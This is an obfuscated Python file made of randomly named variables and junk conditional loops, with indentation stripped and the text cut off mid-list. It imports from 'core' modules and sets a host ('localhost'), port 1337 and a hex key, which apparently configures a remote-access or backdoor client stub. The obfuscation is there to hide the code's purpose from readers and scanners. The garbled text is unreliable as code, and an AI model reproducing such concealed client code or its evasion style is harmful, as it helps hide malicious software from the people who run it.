hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
from core.xMPjIiIPERPCuRrUryvQHyYqqrRGnXzziqxujxkWElGFIQBpyPhzJCPRRQIHQw import HCEwqSIvzuVuOsqtHkJSBDxBGyvADGEjjJGIDlvrESExqlHvSQSszJEkDPJGOBQ
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = 'IPGzINsnUSQMFwPIPpHeDazBsuRiRMWouOtSeeyySTrvIsRUtHiQYBGrIZkPrBx'
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = 'BuvJRRKHUyHIxIxDGQvRpJCwnRRpItCbAsetFYIvvYsJIBzUAvHMIynnqDOGDRF'
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = 'ArszGIACFSzvXmMHJQCPuHFyFCOTSFBZzHCkhjCNQEHMqDjyQoJaxSGxCHCCGlS'
HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB = 'kIlxMyOGZHTzgfyvSHBFqIsVIzJBjrAFEPITyIqZIZDoERTEjwTvFICBSBHGASP'
xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN = 'yFayRNgJgvOHtzRFFSpFsGePwxMCGjJISQWDCrHERPhuwSWJCQJDZvMwAsPruHv'
if nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
if zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB
elif zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji:
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE
if FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
from core.GUHQyNzYwxRHRrtOBrXpxJsOZwCyrSGeJTPwVlAmmpwxqPIASTSRPRISEGtuyIP import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = 'UQsvBxSGqyPtYoEHCNmCJcaePvOCHPkMJvHEztSJguuJIIuXJwOhBYHCUCRZwSl'
SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI = 'xCzFNtvvRYiqwfDAtwvmSElAOtJCoFSETpGMIHEJrWPiJCOCtIuSOEJHgoCmrIv'
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'CDkozkqNQAymGCEzzQSwvSHPQwOItyDUIHDewZsvIZwCDzGDYgtmIMJjsAqvHEf'
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = 'YPynqCIeRqPCCRCmuxoCrAnYBmEHsBBuHFOSSJHrQYvrrCzQJtevGRQCEIFOzBn'
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw:
for IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL:
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
from core.zMJIDSQBjssyEayGxDrxJGHzInFeSJvxzsGGSMSsCIHSEyiEAwPOFiAvyOoavMB import BwtroWhMwUAJNCIxRHzhDBTSCJpUovQxSozAwFoJQVyMQrvQGDCJOCEBlQCVMfA, GDksjjtSttQJGqJCSHBpJxAJSRDrJIDqHDEJwJyFDxQMvxxSnWJyzVqRauBigxx
try:
luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG = 'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ'
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = 'JHnMUIJJzDAoOsXvEokGyCvBEtBIRXrCvBtISdhHHSNmprJrPPtnHxvlITPAjw'
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = 'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN'
qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr = 'RmBujycyGGlrBhsyFzTRmQjGSqENRSpTBsUIJCJvRDZvizFFztAxJRuPjvJoyPx'
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = 'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz'
DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr = 'POSmSiAvABGOYUXHQCbIMkYFOEBXIHGyIOPPjJHeHWHUyyuMirDSGUGIBDJDJEA'
GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx = [
'uHPeBmEEnIPGEceIAQOsDEFFtznzoDBISIIINyGjISPBLHGGxSHAsDVrByIHxyQ',
'OWgDxmBmrpzGvpHvuASSqtEbGywwmSktXzQGGIxnQQxgOmCmrtxzFDXCApEJLfN',
'QrzFAByGkCFESIqyAPInSSvGGKZvDIVIsHuJeDEIBqkwPBJBtwPGaADxRWCwRJz',
'uFFuUnxDtFEyzwmPMfXUvDksUDwQyqzwSITHJBRrFQjvvYRupIFEJeAORGnOBDB'
]
for luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG in DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr:
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX:
if qESSVPqFIOtBHtxGJssCIKuAzRueqoawFHBzwuAiMvRICEBfQYRxxkGrSjAAsEr == vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = luiAasqRPAqFAbHHMGxcFsJHnkwIQLzvAkEGQBAOAsSgkuCONDExjJkGOtDtFDG
elif vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx == nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ:
nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
else:
vhRiCGyAmGwiOGMGVCMLDjvJzQqFzFCtICsDAXSjuxNJrQoaYCGAITtmfBHsEBx = DxwIQPONOSIHtODEIYnvOSSErtyIEwDyvAprVwuSnDvCzsvHGICFJxTJBytwRWr
for nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ in GSwRDztzstSzHrHFvMCEBvGGqCNgWwOJkQzSBHIGvxvSGHGBCtEPBhSGumyuCIx:
OxzIIHESTuPjPQLyJDzqORFAOAQFUIqSPvQBEmxGsAXJrJSQVQGvPqzLEFxwxmX = nDRswIKkBFHAEPyEYzSyySEumHZGoHGwGovJvsEvuuDYINjiFlRRPHEEzHESYFZ
except Exception:
pass
except ImportError as GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = 'llzLJWoQkGzyxyEMTAiGFBrYPJVeyfSyyFHsxBnoulHsqHuwvwpLwUNGIJHPEtP'
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = 'tGwOEAyvIEJRHGtGfQHRyBSIIwGNezvJFHZOFtuFIswBlzqRvCQrvRSAMpnttEQ'
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = 'BSILrwBEqFQkIJQnDAIZXFptJoRqySDEAJIjJxyIvASQcCGvycjCFJwwQuINzJD'
wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL = 'jHBSHySpBDFYENyuHEAEaSCAfqupwwueyqnrFBDhpJvENIHJFnBAsAHWTvQXhuR'
UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE = 'sEJUWOIjxCAmPgznGsySvJGRMabExBodHSEpYAibNlHGtizyCzEvDySBMynDIPJ'
if vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
if vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = wIFvQYsJFSRvnvAzovVFrSuAeSuJEPRJzHItlxqUHDCgvuyXSxlvyzUPJYIwHLL
elif vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT in vjOHArFGWySSwRfPAPrytxyjByRHGRCSWJxFzPtpOtTAZoHijyEDBQJOJqSFwkG:
GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP = vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT
if GwZUHGWqGPzOyGqsyYGWMGHOWDvpJHqFISJOSQObRyJGBuyAJPzSsUqoOmQVFRP in vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT:
vrClsRvNzGuStQvoRvWEHRRTJpCPPwHHXyEIJuCoQowFpzOxwSnmGuWqSpzoIJT = UPOuloDFFbszKzZzQXCwDjMmOyJSuJRQAnIIFBBpODrHmOFywqUFICXxOAqHIDE
print(GRIpvHwJmDsXvKISzSHxOSmrRBkeQuFxFGmJzDJTECGqsYCSyrolqxAeSyHYvuR)
sys.exit(0)
nwsJDSFGtvBSQFxsVSBNEBFkDIeEvfqNEHJStBDIEFuGcCSvRuFGFBOGTCtIxyJ = sys.platform
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = 'GSFWuEAGpAwEklfuDJOHKOwEUzwHywxQAwGyjQIvErPvEwHzmzPBIoEywBPxDnD'
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = 'GDhDBJJCweBDssXFLvAuESSEyxRyhkDwpCuXRSWJqnGvMTAYRsTGRhOIEuGxPSu'
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = 'IvyEABRuRwIPLBAqCquBCHnHkkIBdYDmIrCDDTpPFAxAQltxusiTmuQERlPtCEz'
ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC = 'wGyHInFlnxGxXIhGZPEJSyPEJrDoNpVzANsPIyGrvGyHBGNJIAKBDBPZGHrrqHI'
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = 'ErBvASsGScEAQreHlMJFQJlDDmqDGsJOrHwsJVQgXSXiQSFGPHTNMGpieymHoCy'
xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW = 'vzNxwardqUroBkGVSRCupivMiFxsBzqSgSRvsrqGyyGDrGASQUGiJHCxClIJQqR'
if QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO != ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in ASDwRzSXVHoyOyQFmSEeAASPDsyRGHfCSpSCEHuJVIwxgwIDSvESHnKMSQmxnOC:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW != CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD = JFfEzwESmwwNVAGxznDvvHJvSFEkQVtJEzHBzJRuvqJuPyEGHeOIJqToJJqLxQD
else:
xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
if CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG == QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
for xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW in QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO:
if xRrHNlADCTwxyEEHGCStgInoJvHCwUBDSURxkYByvIICujnJWUIqRNHvRnzsqPW == CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = QGRQRwouEOazIEqAwGHEGHwzFzExIJODGtGpawWzmRHyEGEJiRkzAQCxCkGxxDO
else:
CWMvSpGxICuPwuCEkNlXpAHRAQGYOEUrrJGzFkImNADEgzFEwCWAJzvzrIEiCmG = xTyYtiMJtuREkELjQzyQRxJtOJQHOrQzCzxCIGnQxQhfFyGUDrUgEOHwApzYCJB
CIqEQCPyumOPExHuxRHSGBFHzROHQjEPDCrLBtwvGPEFEzpyGLZoeyqvzPRGAHC = 'localhost'
RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG = 'XPnqyABHjboPmIHyJynQFQEExIGMwvRjrBBEtRlHklTFoIAyAPISuzEpJHFBvnZ'
uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX = 'hDmyQJfnfPLQsvHYrBwJHnBQKyQwRrQDYJJFEEiBAxrDSDTmBRLwjvDFAzstIzF'
hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE = 'JQtPSGuYgrxqIvOGxCGGcFCrFgFPRpXRzuHowHPHCyzGxBHSIMtwrEDBIDZzBRu'
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = 'pFRPrxMyBHwIsyexesMNaHoqyHPWonFpSBIAJGtDjFCFkAHESCHrHGuTiHsGgEB'
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = 'hSYYHPnSggRzIREQDQhRFEYQjAJEnIEBFtnJCRNwEJSnJRRvwGkBzXgcADdNkHO'
rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv = 'qCFzkFGQiBAYDJmvrHBCyRlrxlDwexJIPQtxRuIBFRDpIozeQIRDwHpJRxJIHmH'
if hkRFsqzjsQOuFoqEGACBhIRmNoutXCrtwPwISRFlyHEEPQxCqOfAJHlEoGeFJFE == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
for rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv in ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn:
if rFegFIBHlIoQRFXGsOEGxIDvDzwkHiEAJLRmCOpSECGOAQQLLQUvCUFzmkHRGJv == qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm:
ujoNuzDUFyPSGsSGeIABHxIeyItFUUGyIZGJEwPIEPBHAAxSGiDGJEGOyRSIRhn = RwTBlAQJirnnuBSxAooWFAEHJqIIPSZPAyBIJrrBQAIrYgbGoBQSgDqRIyyktGG
else:
qOyyuJtJFGUoNFCQOJtCPgQUfQmCCGIqrHoRWAvwHRStusEexJBEuBHQIMsRRxm = uDYJBloFYIFrEqxyGnBvIxGRBzCxHIzNJZjorRRIyCJErBnJJsDPLFxjvSSJINX
fnQOIFPteJmyFvhQGBEIESHBAwyZCyBwBCEwIvrwpHikvJwsynfTFDREwwBAEGJ = 1337
CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt = 'IOBSEEJLxPuJSpINpGHSqFuRGDWFHMbnJXDnGvMYGRymPTAGHHQQGNHsEhGozd'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
if CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT == sHoFJJGxuIROSREMRoGoJWVUlGCJPwVuwGBInyqAsFIwFxzQlNRsFDNDyFSPIt:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = CAYEmIEyItnVCAnEzIeMvvRJQBGEwShTGytHGiTiIXBxJBxHGIDEOuRwGgKlsJT
else:
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'PFzvzDsYHMIoQGSDBsPqGADmJxAQRysqovvzRzQkjZkZqRusPBMPzvDxEEyEvxn'
ERknxPGwQWmUBlQSjpqQtyPuvIlxifwDtrBxDSjJqNnxACSXlysFnIsJXvAOJfs = 'EJCytTKGBPTbFAJGLRviQRRRBBJeyJGzSnRRBzDFAYHAwDSEExxGBHXyQEHFyzw'
CFRGQCPCzURSYHUgHlEFsBSnFqsWRJFJCLuvAijkNAfyFExtqWWAAuIDRGEQPsj = 'b14ce95fa4c33ac2803782d18341869f'
try:
ymVTyNXPvwmnSGzusCGFwERDIlGPFQVISdvHuYRMJJQOoDIImntGCHPElvRpsYw = 'cOLwQFnGgBRAQmBIPQFyLNqcYIIWTZbfGYvOoPkDBRmORsGSCGwHHELzWETyyxG'
CFrxCBjHxSvGFuxPiAHElExIFPJFCEGzJHsmEATzyarDSIcZSNPHmRvPIyOuGCG = 'CElERpyFSPuaRGkrCjStJgQQQtuoPCjCCSMrGmjFQZSGICVpBJVDHCqyOEDCOQE'
QMVRDGssAEEYnPztpmEGJSBiAxpyBSDteQYBNQBDwHZnqRHkiGPEpJHzHQRaxT = 'GFJYPDSPICOxBUooJuEwvvHokDvDvgRFgsJGJBmyJkPJRFRIGCRgxtGHBhIQzIU'
wwGopDIoJRByVEMiBJHPvnkAHoRFHAZotOCEfxJBInxNRARJCUIXNoHlHrjRtyk = 'JBWBwJzDRqsEHuAqepJGIxDHZsPDPRpXiFHDBnHBsvzJPRHVSJAHEzsqJPQHQBx'
QtevNgSQHCJECEmGvmqaAJzNIukRvoqSFoSGvszXItRSxKBnFpoHFIDiGBHJNyr = 'AQFwRCxOQyDzBRPCJwJtquVQkIywjwJpCDugfVQwCSAzwvlDpCtynDBukAIUFyQ'
zluSGBHADmBuCxAyxMDBRHspUlHDmJuGPGpCSOEoGBQGeISLwsQvrPlBzzGuFgn = 'upyQIBBVSAnJraVqYzWvJGygDAuQkRVOIumwjGBHHmSJjAwHsqvRRICoMoRSzDi'
FXNwZiyJWIesHsmiHJzjGDQwXHvGDEQwQEoRtHPDmsQysXxHGOtOFggNrYVwIus = [
